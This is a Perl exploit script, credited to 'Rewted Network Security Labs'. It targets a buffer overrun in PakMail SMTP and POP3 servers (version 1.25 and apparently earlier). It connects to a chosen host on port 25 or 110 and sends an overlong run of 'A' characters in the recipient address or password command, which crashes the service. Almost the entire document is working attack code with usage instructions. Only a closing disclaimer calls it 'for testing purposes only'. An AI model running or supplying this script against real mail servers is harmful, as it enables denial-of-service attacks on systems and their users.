#!/usr/bin/perl ################################################ # Rewted Network Security Labs www.rewted.org # # # # Exploits a buffer overrun on PakMail # # SMTP and POP3 servers. # # Vulnerable version 1.25 and probably below. # # Vendor: www.pak.net # # # # Exploited by slackee warminx@null.rewted.org # ################################################ use IO::Socket; use Getopt::Std; getopts('h:t', \%args); if(!defined($args{h}) && !defined($args{t})) { print qq~Rewted Network Security Labs www.rewted.org\nUsage: $0 -h -t -h hostname to test bof -t server type to DoS (1 = SMTP) (2 = POP3) ~; exit; } if(defined($args{h}) && defined($args{t})){ if(($args{t}) == 1) { &pakmail; } if(($args{t}) == 2) { &pakpop; }} sub pakmail { $victim=$args{h}; $denial .= "A" x 1390; $socket = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $victim, PeerPort => "25") or die "Can't connect.\n"; print $socket "MAIL FROM: test\@localhost\n"; print $socket "RCPT TO: $denial\@localhost\n"; print "\nSent overflow to $victim\n"; close $socket; } sub pakpop { $victim=$args{h}; $denial .= "A" x 1400; $socket = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $victim, PeerPort => "110") or die "Can't connect.\n"; print $socket "user test\n"; print $socket "pass $denial\n"; print "\nSent overflow to $victim\n"; close $socket; } # Neither I or Rewted Network Security Labs is liable for usage of this script. # This is for testing purposes only, use at your own risk.